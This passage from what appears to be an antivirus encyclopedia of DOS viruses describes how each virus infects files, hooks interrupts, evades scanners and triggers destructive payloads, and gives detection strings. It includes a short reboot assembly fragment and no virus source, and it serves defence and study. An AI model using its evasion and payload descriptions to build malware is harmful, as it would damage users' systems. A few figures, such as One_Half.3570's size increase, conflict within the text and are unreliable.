area. It will then hook INT 21 with infection procedures to
services 4B00(Execute Program), 3D02(Open File Handle), and 40(Write
to File/Device).
This virus will infect all EXE and COM files that are opened, renamed,
or executed.
The virus is named as such because of the string "PHX" on the virus
code.
[HI.460]
Virus Type: File Virus
Other Name:
Virus Length:
Virus Infect Type: EXE files
Place of Origin:
Virus Memory Type: High Memory Type
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Checks if the value stored in DS:[0164] is 2ED3h (if 2ED3h is not
moved to that address).
2) Loads itself in the high memory in address 9FC0:0h.
3) Hooks interrupt 21h, then sets it. Once in the memory, the virus
waits for an EXE file to be executed to infect it. A word "Hi"
can be found in the virus code for every infected EXE file.
[Liberty.2857.A]
Virus Type: File Virus
Other Name:
Virus Length:
Place of Origin:
Virus Memory Type: High Memory type
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself from 11B0:0110 to 9DEE:0110h, with 2858 bytes.
2) Encrypts the data from 11B0:[0115] with CX value = 3Ch. In this,
"LIBERTY" can be found but after encrypting it the data in that
address will become "Me BC.".
3) Encrypts the message again from 11B0:0113h to 114C:0100h and produces:
"- M Y S T I C - COPYRIGHT (c) 1989-2000, by SsAsMsUsEsL"
4) After it is loaded in the high memory, it waits for an EXE
or COM file to be executed to infect it.
[Sibylle.853]
Virus Type: File Virus
Virus Length: Approximately 867 bytes
Virus Memory Type: High Memory
Place of Origin:
Trigger Condition: Activates only if the millionth of a second is
less than 32. If not, then it just exits the code
without loading itself to the memory.
PC Vectors Hooked: Int 21h, Int 2Fh
Infection Procedure:
1) Loads itself to high memory, allocating 928 bytes (using MEM).
2) Moves 904 (01C4H x 2) bytes to high memory.
3) Infects *.EXE files. Copies the virus code to the host program,
adding approximately 867 bytes. Loads first the virus before
running the host program.
While memory resident, the virus infects any executed *.EXE files.
It does not do anything special. It just replicates when it is resident
in the memory. Only infects executed files.
Damage:
1) Free memory decreases by approximately 928 bytes.
Using MEM.EXE, 928 bytes will be used by MSDOS (tricky).
2) Increase in file size. Adds approximately 867 bytes.
Symptom: Delay in program execution due to virus activity.
Detection method: Locate the virus text strings.
[Fich-1]
Virus Type: File Virus
Other Name:
Virus Length:
Virus Infect Type: COM files (including COMMAND.COM)
Place of Origin:
Virus Memory Type: MCB Type
PC Vectors Hooked: Int 21h
Infection Procedure:
The virus is a TSR program. After the virus is executed
it immediately infects COMMAND.COM. Then it
waits for another file to be executed to infect it. This
virus only infects COM files. When one uninfected file
is executed another COM file gets infected.
Also, the virus doesn't re-infect files. Before the virus
loads itself to the memory, it checks first whether the virus
is already memory resident.
Note: The virus makes a smart move by hooking Int 1 and 3 to
fool the one debugging it.
[Hdenowt]
Virus Type: File Virus
Other Name:
Virus Length:
Virus Infect Type: COM and EXE files (including COMMAND.COM)
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Saves the first 16 bytes to address 114C:08D5h and
later changes the first 16 bytes at 0:0 from 11BA:0285h. But
before changing, an encryption occurs starting in 11BA:012Eh by
XORing it to 95h, 288 bytes.
2) When the virus code is executed, it locates COMMAND.COM,
then it searches for other COM and EXE files in the same
directory where the virus is executed. The infection can't
be easily be seen because the size of the file is still the
same.
Symptom: Infected files increase by approximately 1700 bytes.
[Kacz]
Origin:
Eff Length: 4444 bytes
Virus Type: Polymorphic File Virus
Symptoms :
EXE files increase by 4444 bytes and there is a decrease
of 6144 bytes in the available memory. Infected files tend to
display messages like: "Error Loading Program File", "File not
Found", and "Memory Allocation Error."
General Comments:
On the first infection, KACZ first decrypts 4387 bytes of its
code and then allocates 6144 bytes in the High Memory
Area. It then transfers 4387 bytes of its code to that area.
It then hooks INT 13 and INT 21. Then reads the Boot Record of the hard
disk and tries to modify it. It writes the new infected Boot Record on
the hard disk so every time it is used for booting up the virus will be
memory resident.
This virus will infect all EXE files that are opened, renamed,
or executed. It will also change the file's Second field to 62.
These messages are found in the decrypted virus code:
"Zrobione"
"Wersja"
"Kodowanie"
"Liczmik HD"
"K a c z,o r t e s t"
[V-BCIV-1]
Other Name: VIENREBO
Virus Type: File Virus
Virus Length: Approximately 648 bytes
Virus Re-infect: Does not re-infect, infected file size is consistent.
If the file is already corrupted it skips and looks
for another COM file.
Virus Memory Type: Non Resident, Direct Infector
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
Directly infects *.COM files when an infected file is executed. Copies
the virus code to the host program, adding approximately 648 bytes.
Loads the virus first before running the host program.
The virus first gets and sets DTA for transfer purposes.
The virus then searches for *.COM files within the directory using
Int 21 (4E and 4F). If the search is successful, the virus gets the
file's attribute using Int 21 (43). It changes its attribute to enable
the write function (especially for the COMMAND.COM). It takes note of
the file time and date using Int 21 (51) so that when it accomplishes
its task of altering the code, it can save the file using the original
file time and date. This therefore deceives the user that the file was
never been changed.
Every time an infected file is executed, one COM file is infected
within the same directory.
Damage:
1) Increase in file size. Adds approximately 648 bytes.
2) Corrupts COMMAND.COM, making it unusable. Other COM files run
normally.
Symptom: Delay in program execution due to virus activity.
[Nightfall.4518]
Origin:
Eff Length:
Virus Type: File Virus
General Comments:
1) Decrypts a part of its code with a size of 4526 bytes and then
decrypts it again.
2) Checks if it is already loaded in the memory by checking the
interrupt vectors of INT 13, INT 21 and INT 2A.
3) Allocates 5680 bytes in the High Memory Area.
After loading itself resident in the High Memory Area, the virus seems
to be doing nothing. It is possible that the virus has some bugs.
[Dig.Death.3787]
Virus Type: Polymorphic, File Virus
Virus Length: 3,547 bytes
Virus Infect Type: .COM and .EXE file
Virus Re-infect: No
Virus Memory Type: High memory resident
Place of Origin:
PC Vectors Hooked: INT 21h, INT 13h, INT 1Ch
Infection Procedure:
The virus infects both .EXE and .COM files. It infects its host file by
attaching itself at the end of the file. It increases an infected
file's size by 3,547 bytes. The virus can become memory resident upon
loading and executing an infected file. As a polymorphic virus it
first decrypts 3,422 bytes of its code. Then it allocates 5,120 bytes
in the high memory starting at 9EB0:0000. From there it hooks to INT
21H by pointing its vector to its program in the high memory. It uses
service 4BH of the interrupt to be able to attach itself to loading and
executing files. It also uses service 4EH and 4FH to hide the actual
increase in the sizes of the infected files once the virus has become
memory resident; thus, the infection is unnoticeable. Once the virus
has attached itself to the host file the virus encrypts its code again
and writes it to a new file. No payload or trigger was seen. The virus
just replicates itself to .COM and .EXE files.
Symptom: Infected files increase by 3,547 bytes.
[Vinchuca]
Virus Type: File Virus
Virus Length: Encrypted code size is 912 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h, Int 27h
Infection Procedure:
1) Loads itself to high memory, loading approximately 1328 bytes.
2) Infects *.COM files. Copies the virus code to the host program
(code size is 912 bytes). Loads the virus first before running
the host program.
3) While memory resident, the virus infects all COM files that are
opened.
The virus code is transferred to the allocated memory space using Int
21 (4A). The actual virus code is immediately executed upon meeting
the requirements.
The virus is TSR, using Int 27. Basically, the virus reacts by
transferring its code to the high memory before actually attaching it
to the code itself.
Symptom: May display
"Saludos para Satanic Brain y Patoruzi"
"Virus Vinchaca v.1,0 1993"
"Creado por Murdock."
"Buenos Aires, Argentina"
"Su PC tiene mal chagas....jajaja...."
which appears in the virus code.
Detection method: Decrypt the virus code before detection. Look for
the above strings.
Note: The virus code contains Int 13 (16) which tests for the disk
change information.
[Ginger.2774]
Virus Type: File Virus
Other Name:
Virus Length:
Place of Origin:
Virus Memory Type: OS Memory Type (after rebooting=High Mem)
PC Vectors Hooked: Int 21h, Int 13h
Infection Procedure:
The virus is an OS type, hooking Int 13 and 21h.
The virus infects the boot record first, so when the
machine is reset, the virus will be loaded in the high
memory. From there it infects files. It allocates 4096 bytes
in the memory.
The problem is whenever the virus is executed and the
machine is reset, after rebooting, the keyboard
doesn't work due to the use of Int 15h. Because of this
no infection will occur.
[Mirea.1788]
Alias:
Origin:
Eff Length: 1788 bytes
Virus Type: File Virus (COM files)
Symptoms :
COM files will increase by 1788 bytes, and there will be a decrease
of 2368 bytes in the available memory. Execution of running programs
will slow down.
General Comments:
The MIRE1788 virus first allocates memory with a size of 2368 bytes
and then transfers its virus code to the High Memory Area with a size
of 1788 bytes. It will then check the date if the day is 13. And
then it will hook INT 8, INT 9 and INT 21. This allows the virus to
infect other .COM files.
If the day of the month is 13, the virus is memory resident and the
keyboard has not been pressed for 30 minutes, the virus will
display a red dialog box at the center of the screen with ASCII text
written on it. The only readable characters are the numbers 16 and
a set of numbers 133-20-60.
It also hides an infected file when a DIR at the command prompt is
executed so as to hide the increase in the size of the infected
file.
[Little-Red]
Virus Type: File Virus
Virus Length: 1465 bytes
Virus Infect Type: n/a
Trigger Condition: Year < 1994, Date = Sept. 9, Dec. 26
Virus Re-infect: n/a
Virus Memory Type: High Memory Resident
Place of Origin:
PC Vectors Hooked: INT 1Ch, INT 21h, INT 24h
Infection Procedure:
1) Decrypts a part of its code and then executes it which turns out to
be a "Get DOS Version" function. The virus uses this function
because it directly controls DOS' resources.
2) Encrypts this part again.
3) Modifies the Allocated Memory and allocates 2048 bytes in the High
Memory Area. It is now ready to transfer the virus code into HMA
with a size of 1465 bytes.
4) In the high memory area, the virus hooks INT 1C, 21 and 24.
5) Opens the file being executed and checks if it is a .COM file; if it
is, it checks if the file is already infected; if not, the virus
infects it. After infection, the virus changes the attribute of
"C:\COMMAND.COM" from "read-only" and "system" to "archive".
[Civil_defense_FB]
Virus Type: Boot, File Virus
Virus Length: 6656 bytes
Original Name: CIVIL DEFENSE
Virus Infect Type: .COM and .EXE files
Virus Re-infect: no
Virus Memory Type: Non-memory resident
Place of Origin:
Infection Procedure:
The virus primarily infects the Master Boot Sector of drive C:\. It
first reads the boot sector of drive C:\ and the following sector
(head 0, cylinder 0, sector 2) in its program. Then it reads 1
sector from head 0, cylinder 87, sector 65 of drive C:\. The virus
sets this up by copying other data from the original boot record, and
then writes this to the boot sector of drive C:\; thus, replacing the
original one. Then it copies its 6,656 bytes code (13 sectors) to
sector 66, cylinder 87, head 0 of drive C:\.
During the analysis it was seen that it infected the virus program file
CIV6672.EXE by opening it, copying its own header to the file, moving
the file pointer to the end of the host file (CIV6672.EXE), and then
performing INT 40H (Write to file) with the size of memory to write
equals 0 (CX=0000). Thus, it just corrupts the virus program file. It
was not seen how the infected boot sector loads its program from sector
66, cylinder 87, head 0 of drive C:\ which may be the reason why the
infected boot sector doesn't infect the loaded and executed files.
There was also no interrupt hook, memory allocation to make it resident,
and trigger seen. As verified from DOS CHKDSK, there was no change in
the memory allocation after loading the virus program CIV6672.EXE.
Therefore, it was concluded that the virus infects the boot sector by
directly running the virus program file without knowing how the virus
can replicate itself in other executable files that can infect the
Master Boot Sector of drive C:\ upon loading and execution of the
files.
Symptom: Slows down the file loading and execution time.
[Plagiarist.2051]
Alias: PLAGIARIST
Origin:
Eff Length: 2051 bytes
Virus Type: Multi-partite Virus
Symptoms :
EXE and COM files increase by 2051 bytes and there is a decrease of
2048 bytes in the available memory.
General Comments:
On the first infection, the virus checks if the date is between 1993
and 2042. If this is the case, it makes a copy of the boot
record at the logical end of the drive and transfers its code
right after the boot record. Then it replaces the current boot
record with its own infected boot record. The virus will not activate
at this time. It will activate when you boot from the infected drive.
The virus allocates 2048 bytes in the high memory and transfers the
virus code in the disk to the High Memory Area. Afterwards it hooks
INT 21, INT 28, INT 08, and INT 13.
[VLamiX]
Virus Type: File Virus
Virus Length: Approximately 1062 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h, Int 10h
Infection Procedure:
1) Loads itself onto the high memory, allocating approximately 1,136
bytes.
2) Infects *.EXE files. Copies the virus code to the host program,
adding approximately 1091-1106 bytes. Loads the virus first before
running the host program.
3) While memory resident, the virus infects all opened EXE files.
The virus code is decrypted. The virus reacts ordinarily by allocating
space in the memory before infecting files. Nothing extraordinary
happens. It just attaches its code to the host program.
Symptom: May display
"Smartc*.cps chklist*"
"-=* Die-lamer *=-"
"chklist ???"
"chklist.cps"
"Vlamix-1"
which appears in the decrypted code.
Detection method: Decrypt the virus code before detection. Look for
the above strings.
[Sleepwalker]
Virus Type: File Virus
Virus Length: At the range between 1268-1282
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h, Int 1Ch
Infection Procedure:
1) Loads itself onto the high memory, allocating approximately 1552
bytes.
2) Infects *.COM files. Copies the virus code to the host program.
Loads the virus first before running the host program.
3) While memory resident, the virus infects all opened COM files.
The virus code is transferred to the allocated memory space using Int
21 (4A). The allocation space setting is determined by checking the
memory from high to low using Int 21 (5801). The virus also uses the
Int 1c handler to take note of the timer tick, possibly using it for
some payload.
Basically, the virus reacts by transferring its code to the high memory
before actually attaching it to the code itself. The virus calls string
"STAC," but it is uncertain if the other strings are displayed.
Symptom: May display
"STAC"
"Sleepwalker. (c) Optus 1993."
which appears in the virus code.
Detection method: Check for the above string.
[Alfon]
Virus Name: ALFO1344
Virus Type: File Virus
Virus Length: 1344-1426 bytes
Virus Infect Type: .COM and .EXE files
Virus Re-infect: No
Virus Memory Type: Memory resident, MCB type
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus infects both .COM and .EXE files. It infects .COM files by
moving the host program lower and attaching the whole virus program at
the beginning of the file. It's opposite with the .EXE file infection
wherein the attachment of the virus program is normal or attaches its
program at the end of the host program. The host program's file size
increases by 1344 bytes for .EXE files while 1426 bytes for .COM files
after infection.
The virus first detects if a file is already infected. If it is, it
leaves the file behind. If it isn't, it infects it by allocating
memory after the resident part of COMMAND.COM and copying its program
to that location. It then hooks INT 21H by changing its vector to its
program at 17F8:01CF. Upon executing the interrupt's service 4BH, it
attaches its program through the interrupt services of INT 3H which
holds the original vector of INT 21H. After attaching its program to
the host it returns to its memory resident program at 17F7:0000 to
infect other loading and executing files.
Symptom: Increase in file size by 1344 bytes (for .EXE) and 1426 bytes
(for .COM).
[HLLO.Beeper]
Virus Type: File Virus
Other Name:
Virus Length:
Virus Infect Type: EXE files
Virus Reinfect Type: Non-Resident
Place of Origin:
Virus Memory Type:
PC Vectors Hooked:
Infection Procedure:
When an infected file is executed, three EXE files will be
infected, copying their filenames and changing their extensions
to .COM. For every infected file, when executed, at most three EXE
files get infected.
This enables the virus code to execute first before the
original EXE file.
[One_Half.3544]
Virus Status:
Origin:
Eff Length: 3500-5500 bytes
Virus Type: Polymorphic Virus
Symptoms :
Increase in the size of infected COM and EXE files by 3544 bytes
and decrease in available memory by 5120 bytes. Executing
programs may slow down due to the infection procedure of the virus.
General Comments:
One-Half is a multipartite, polymorphic virus. It will first infect
the boot sector of a hard disk and it will only be memory resident
if the hard disk is used for booting. During bootup, it will allocate
5120 bytes of the memory and will reside in the High Memory Area. It
will then hook INT 21, INT 13, and INT 1C.
All COM and EXE files executed, opened or copied will be infected by
the virus and will increase by 3544 bytes.
The virus is also capable of hiding itself from anti-virus software.
It can also hide the increase in the file size 'cause it adds special
codes to check for infected files and modifies their file size when
viewed.
One-Half encrypts an area of the hard disk every time it starts up.
This means that it slowly encrypts all the data in your hard disk.
Though these areas are decrypted back when the virus is memory
resident, it is advisable to create a backup copy of important
files while the virus is still memory resident. This makes the
virus hard to remove because it hides its encryption code encrypted
in the Boot Record.
The following messages are found in the decrypted virus code:
"Dis is one half."
"Press any key to continue"
"Did you Leave the room?"
[One_Half.3570]
Virus Name: ONEH3570
Alias: ONE-HALF.3570
Origin:
Eff Length: 3500-5500 bytes
Virus Type: Polymorphic Virus
Symptoms :
Increase in the size of infected COM and EXE files by 3570 bytes
and decrease in available memory by 5120 bytes. Executing
programs may slow down due to the infection procedure of the virus.
Data sometimes turn out as garbage due to the virus encryption.
General Comments:
One-half.3570 is a multipartite, polymorphic virus which is a variant
of the One-Half.3544. It will first infect the boot sector of a hard
disk and it will only be memory resident if the hard disk is used for
booting. During bootup, it will allocate 5120 bytes of the memory and
will reside in the High Memory Area. It will hook INT 21, INT 13, and
INT 1C.
All COM and EXE files executed, opened or copied will be infected by
the virus and will increase by 3544 bytes.
The virus is also capable of hiding itself from anti-virus software.
It can also hide the increase in the file size by adding special
codes to check for infected files and modifying their sizes when
viewed.
One-Half encrypts an area of the hard disk every time it starts up.
This means that it slowly encrypts all the data in your hard disk.
Though these areas are decrypted back when the virus is memory
resident, it is advisable to create a backup copy of important
files while the virus is still memory resident. This makes one-
half hard to remove because it hides its encryption code encrypted
in the Boot Record.
The following messages are found in the decrypted virus code:
"Dis is one half."
"Press a key"
"Did you leave the room?"
[Unsnared]
Virus Type: File Virus
Virus Length: Approximately 814 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself onto the high memory, allocating 1024 bytes (9FC0:0000).
2) Moves approximately 814 bytes (032EH) in the high memory.
3) Infects *.EXE files. Copies the virus code to the host program,
adding approximately 814 (032EH) bytes. Loads the virus first
before running the host program.
4) While memory resident, the virus infects all opened EXE files.
The virus reacts ordinarily by allocating space in the memory before
infecting files. Nothing extraordinary happens. It just attaches its
code to the host program after it is loaded from the memory.
Damage:
1) Decrease in memory free space.
2) Increase in file size.
[Ant4096B]
Virus Name: ANT4096B
Virus Type: File type
Virus Length: 4096 bytes
Original Name: INVADER
Virus Infect Type: .COM and .EXE files
Virus Re-infect: No
Virus Memory Type: Memory resident, MCB type
Place of Origin:
PC Vectors Hooked: INT 21h, INT 8h, INT 9h
INT 13h
Infection Procedure:
The virus infects both .COM and .EXE files. It infects .COM files by
moving the host program lower and attaching the whole virus program at
the beginning of the file. It's opposite with the .EXE file infection
wherein the attachment of the virus program is normal or attaches its
program at the end of the host program. The host program's file size
increases by 4096 bytes after infection. The virus program allocates
320 paragraphs (5120 bytes) in the lower part of the memory, after the
resident part of COMMAND.COM, specifically at 17F8:0000. It decrypts
424 bytes of its program using XOR 46H. After decrypting it can be
seen in the data area of the virus program a string saying "by Invader,
Feng Chiu U., Warning: Don't run ACAD.EXE". Then it hooks INT 21H by
changing its vectors to 1808:05DF, INT 08H to 1808:01F9, INT 09H to
1808:02B8, and INT 13H to 1808:0435. No payload was seen in the
interrupt hooks. The virus only infects the loaded and executed files.
Symptom: Infected files increase by 4096 bytes.
[Ontario-B]
Alias:
Origin:
Eff Length: 1024 bytes
Virus Type:
Symptoms :
Increase in size of COM and EXE programs by 1024 bytes and
decrease in free memory by 2048 bytes.
General Comments:
On the first infection, this virus will first allocate 2048 bytes in
the High Memory Area and then will transfer 1024 bytes of its code to
that area. It will then hook INT 21 with infection procedure to
services 4B00(Execute Program), 3D02(Open File Handle), 11 and 12
(Find Directory Entries).
This virus will infect all EXE and COM files that are opened, renamed,
or executed. It will also hide infected files when viewed or listed
using the DIR command.
There seems to be no damage done by the virus other than replicate.
[Nov_17]
Alias: November-17th.800
Origin:
Eff Length: 800
Virus Type: File Virus
Symptoms :
Will increase .COM and .EXE files by 800 bytes and will allocate
832 bytes in the High Memory Area.
General Comments:
On the first infection, this virus checks if the file carrier is .EXE.
It will infect .COM and .EXE differently because of the difference in
the structure of the two. It then allocates 832 bytes in the High
Memory Area and then moves its virus code to HMA. Then it hooks INT 21,
with points to services 3D (Open File Handle), 43 (Get/Set File
Attributes) and 4B00 (Execute Child Process). After this, the virus
returns control to the original routine.
This virus will change the attributes of files opened or executed,
in addition to infecting them, once the virus is memory resident.
Upon loading, NO-17-800 will check if the system date is between
November 17 and November 30; if it is, the virus will save the
system time's hour of day and will always check it until it has
changed; this is when it will write 8 sectors starting at the 1st
sector of the default drive. This will destroy the Boot Record and
files located in the first 8 sectors of floppy disks while it will
destroy the Boot Record and the File Allocation Tables of the hard
disk depending on the default drive of the system.
This string is found in the virus code:
"SCAN.CLEAN.COMEXE"
[Nov_17th.855.A]
Alias: NOVEMBER 17-855
Origin:
Eff Length: 855
Virus Type: File Virus
Symptoms :
Will increase .COM and .EXE files by 855 bytes and will allocate
896 bytes in the High Memory Area.
General Comments:
On the first infection, this virus checks if the file carrier is .EXE.
It will infect .COM and .EXE differently because of the difference in
the structure of the two. Then it allocates 896 bytes in the High
Memory Area and then moves its virus code to HMA. It then hooks INT 9
and INT 21, with points to services 3D (Open File Handle), 43
(Get/Set File Attributes) and 4B00 (Execute Child Process). After
this it returns control to the original routine.
This virus will change the attributes of files opened or executed,
in addition to infecting them, once the virus is memory resident.
This is a variant of the NO17-800 virus but the difference is that
this virus is triggered by the keys pressed and not by time as that of
NO17-800 virus. When a certain number of keys are pressed and if the
system date is between November 17-30, this is when it will write
8 sectors starting at the 1st sector of the default drive. This will
destroy the Boot Record and files located in the first 8 sectors of
floppy disks while it will destroy the Boot Record and the File
Allocation Tables of the hard disk depending on the default drive
of the system.
This string is found in the virus code:
"SCAN.CLEAN.COMEXE"
[No_Frills.Dudley]
Virus Status:
Origin:
Eff Length: 1215
Virus Type: File Virus; Encryption Virus
Symptoms :
Will increase .COM and .EXE files by 1215 bytes and will allocate
4624 bytes in the High Memory Area.
General Comments:
On the first time it is loaded, NOFDUDLY will first decrypt 1153 bytes
of its code. Then it will check if it is already loaded in the memory.
If it is not yet loaded then it will allocate 4624 bytes in the
High Memory Area. Then it will transfer all of its 1215 bytes code
to the High Memory Area. It will then hook INT 21, adding extra
codes to services 54 (Get Verify Flag), 4B00 (Execute Program),
3D (Open File Handle), 56 (Rename File), and 6C (Extended Open/Create).
Then it will return control to the original routine.
When in memory, NOFDUDLY will temporarily hook INT 24 (Critical Error
Handler) so that it can readily troubleshoot problems if errors
occurred and then unhook it again. Then it will infect the command
interpreter (COMMAND.COM) of the default drive.
This virus is an enhanced variant of the NOFRILLS virus with an
additional encryption enhancement to the older variant.
Text message found in the virus code:
"[Oi Dudley] [PuKE]"
[No_Frills.843]
Alias: NO FRILLS
Origin:
Eff Length: 843
Virus Type: File Virus
Symptoms :
Will increase .COM and .EXE files by 843 bytes and will allocate
1536 bytes in the High Memory Area.
General Comments:
This virus will first check if the carrier file is .COM or .EXE. It
will do so to know which code will be transferred to the High
Memory Area. It will then allocate 1536 bytes of High Memory Area
and transfer 400h of its virus code to it. It will then hook INT 21
adding extra codes to services 54 (Get Verify Flag), 4B00 (Execute
Program), 3D (Open File Handle), 43 (Get/Set File Attributes), and 6C
(Extended Open/Create). Then it will return control to the original
routine.
When in memory, NOFRILLS will temporarily hook INT 24 (Critical Error
Handler) so that it can readily troubleshoot problems if errors
occurred and then unhook it again. Then it will infect the command
interpreter (COMMAND.COM) of the default drive.
This message is found in the virus code:
"+-No Frills 2.0 by Harry McBungus-+"
[Nomenklatura]
Virus Status:
Origin:
Eff Length: 1024 bytes
Virus Type:
Symptoms :
Increase of 1024 bytes in sizes of EXE and COM files and decrease of
1072 in the available memory. Usually displays disk
read/write errors like "Sector not found", "Invalid Media Type" and
other disk related errors.
General Comments:
The NOMENKLATURA virus is almost similar to common viruses to date.
The difference is that it uses INT 2F service 13 (Set Disk Interrupt
Handler) which is more like an error-trapping procedure for the virus
when infection of other files is impossible. It is common to other
viruses because it will first allocate in the High Memory Area with a
size of 1072 bytes and then transfer 1055 bytes of it to the high
memory. The extra bytes loaded by the virus are the addresses of
specific locations in the Operating System in the memory so it can
directly access it and also the interrupt vectors of INT 21 and INT 13.
It also has checking procedures if an executed file is infected or not,
if it is COM or EXE. Executable files that are opened and/or executed
will be infected immediately by this virus.
This virus was named as such because of the text string found in the
virus code : "NOMENKLATURA"
[Cordobes.3334]
Virus Type: Polymorphic, File Virus
Virus Length: 3,333 bytes
Virus Infect Type: .EXE files
Virus Re-infect: no
Virus Memory Type: Memory resident, MCB type
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus only infects .EXE files. The virus infects the host file by
attaching itself at the end of the file. As a polymorphic virus, it
first decrypts its code. The virus has a complicated way of decrypting
its code. The virus allocates 4,128 bytes in the low memory starting
at 1806:0000 and copies its 3,333 bytes program there to stay resident.
From there it hooks INT 21H by pointing its vector to its program in
the low memory at 1816:0BAB. It uses this interrupt to attach itself
to the loading and executing .EXE files. Once activated by loading and
executing infected files the virus checks for the current month and
day. If it is August 10 the virus infects files. Aside from infecting
.EXE files, it will also search for AUTOEXEC.BAT in drive C:\ and
append the following:
@Echo Virus "EL MOSTRO CORDOBES"
@Echo No tema por sus datos. Que pase un buen
@Echo.
@Pause
Thus, upon system bootup in drive C:\ the text string above will be
displayed and will pause until a key is pressed. The same string can
be seen inside the viral code. Sometimes the virus cannot attach to
.EXE files completely so the increase in the size of the host file
after infection is indefinite, and cannot become memory resident.
The corrupted files will not finish loading and will display "Error
in EXE file."
Damage: Corrupts .EXE files.
Symptom: Will add the above text to the AUTOEXEC.BAT file in drive C:\.
[Jos]
Virus Type: File Virus
Virus Length:
Virus Infect Type: MBR
Place of Origin:
Virus Memory Type:
PC Vectors Hooked:
Infection Procedure:
1) Moves 21CDh in DS:[FE], 14EBh in DS:[100] and 17h in DS:[11E].
2) Loads/executes a program having the control block = 114C:11E and
ASCIIZ command line = 114C:0. This procedure is unsuccessful.
3) Writes character in teletype mode having 1Eh as the graphics mode,
page 1. Displaying :
"Beware the Jabberwock, my son!"
"The jaws that bite, the claw that catch!"
"And hast thou slain the Jabberwock!"
"Come to my arms, my beamish boy!"
4) Loops with FFFFh as the value of CX (just a delay).
5) Executes these codes:
MOV GS,DX
CLI
CLD
IN AL,64
TEST AL,04
JNZ D840
D840: SMSW AX
TEST AL,01
JZ D84F
CLI
MOV AL,FE
OUT 64,AL
After performing these codes the machine performs a warm boot.
Symptom: A message can be seen in address = 114C:0239h
"JABBERW OCKY (.) the first Romanian
Political Virussian
Dhohoho$
Released Date 12-22-1990"
[Npox.963.A]
Alias: EVIL GENIUS 2.0
Origin:
Eff Length: 963 bytes
Virus Type:
Symptoms :
Increase of 963 bytes in sizes of EXE and COM files and decrease
of 1024 in the available memory. When in a write-protected floppy,
it usually displays a "Write Protect Error" message when you try to
read from it.
General Comments:
On the first infection, this virus allocates 1024 bytes in the High
Memory Area and then transfers its code to the HMA. After that, it
hooks INT 21 and INT 9 and then returns control back to the original
routine.
This text string can be found in the virus code:
"Evil Genius V2.0 - RS/NuKE"
"C:\COMMAND.COM"
It will infect COM and EXE files that are loaded, executed or opened
by other files. During infection, the file's time and date will not be
modified except for the seconds count which will be set to :58. This
is also the virus' signature if a file is already infected. But
before infecting files, it checks whether the file is executed by
another program (i.e., debuggers, anti-virus). If it is being executed
by another file then it will check if the file loader has the following:
1.) ****prot.*** (i.e. f-prot, nprot, lprot)
2.) ****scan.*** (i.e. pcscan, scan, viruscan)
3.) ****lean.*** (i.e. clean)
If the above characteristics are not satisfied then it will infect the
executed program.
Once resident, the N-Pox virus will hide the increase in the size of
infected programs when the user tries to view it (i.e., DIR). It will
also modify loaded infected files in the memory so as to hide them from
anti-virus software.
The damage that N-Pox does is that if the system date is the 24th of
any month and if a key is pressed, it will format the first 32 tracks
of the hard disk, starting from track 0. This will damage the Boot
Record, File Allocation Tables (FAT) and the system files on the hard
disk.
[Cpw.1527]
Virus Type: Polymorphic, File Virus
Virus Length: 1,527 bytes
Virus Infect Type: .EXE and .COM file
Virus Re-infect: No
Discovery Date: 1992
Virus Memory Type: High memory resident
Place of Origin: Chile
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus infects both .EXE and .COM files. It infects its host file by
attaching itself at the end of the file. It increases an infected file's
size by 1,527 bytes. The virus can become memory resident upon loading
and executing an infected file. As a polymorphic virus it first decrypts
its code. Then it allocates 1,984 bytes in the high memory starting at
9F84:0000. It hooks INT 21H by pointing its vector to its program in the
high memory at 9F84:0258 to be able to attach itself to loading .EXE and
.COM files upon opening it. Before infecting a loading executable file,
it first deletes CHKLIST.CPS, which is an anti-virus file, if it exists.
Then it infects COMMAND.COM in drive C:\ by attaching itself to the
file. After infecting C:\COMMAND.COM, it finally infects the loading
executable file. During infection, the virus checks for the current
month, day, and hour. If the current date is September 11 or December
28 then it checks for the current hour. The following hour of the day
will trigger the payload:
0th hour.......(12:00 am)
1st hour.......(1:00 am)
4th hour.......(4:00 am)
6th hour.......(6:00 am)
7th hour.......(7:00 am)
10th hour.......(10:00 am)
11th hour.......(11:00 am)
13th hour.......(1:00 pm)
16th hour.......(4:00 pm)
18th hour.......(6:00 pm)
19th hour.......(7:00 pm)
21st hour.......(9:00 pm)
The payload deletes the first file entry in the current directory until
it deletes the currently loaded file. Even though the currently loaded
file that activated the virus was deleted, the virus still remains
memory resident, and will continue its payload. The deletion occurs
every time an executable file is loaded, given that the virus is
already memory resident. Not all .COM files are infected by the virus.
Only those that have large file sizes will be infected. As checked from
DOS CHKDSK the virus occupies 1,792 bytes in the memory or decreases
the available memory by that size. The following text strings can be
seen within the virus code:
"CPW fue becho en Chile en 1992,"
"VIVA CHILE MIERDA!"
[DR&ET]
Virus Type: Polymorphic, File Virus
Virus Length: 1,710-1,713 bytes
Virus Infect Type: .COM and .EXE files
Virus Re-infect: No
Virus Memory Type: High memory resident
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus infects .COM and .EXE files. It increases an infected file's
size by 1,710 bytes for .COM file and 1,713 bytes for .EXE file. The
virus infects the host file by attaching itself at the end of the file.
The virus can become memory resident upon loading and executing an
infected file. When memory resident the virus can infect executable
files when it is opened. The virus uses complex method of decryption.
After decryption the virus allocates 1,776 bytes in the high memory
and copies its program there to stay resident. Then it hooks INT 21H
by changing its vector to point to its program in the high memory at
9F92:017A. It uses this interrupt to attach itself to the host file.
Before attaching to the host file, the virus encrypts its code again
and then writes itself to the host file.
During infection, the virus checks for the current day. If it is the
13th day of the month it checks for another condition by decrypting
and comparing data from its data area whose condition is possibly
known only to the author of the virus. If the 2 conditions are
satisfied it will execute the payload of overwriting the Master Boot
Sector of drive C:\ with its own program and replacing the original
Interrupt Vector Table with its own table. As a result the system
will hang up during bootup. The date and time attributes of the
host file after infection are not changed.
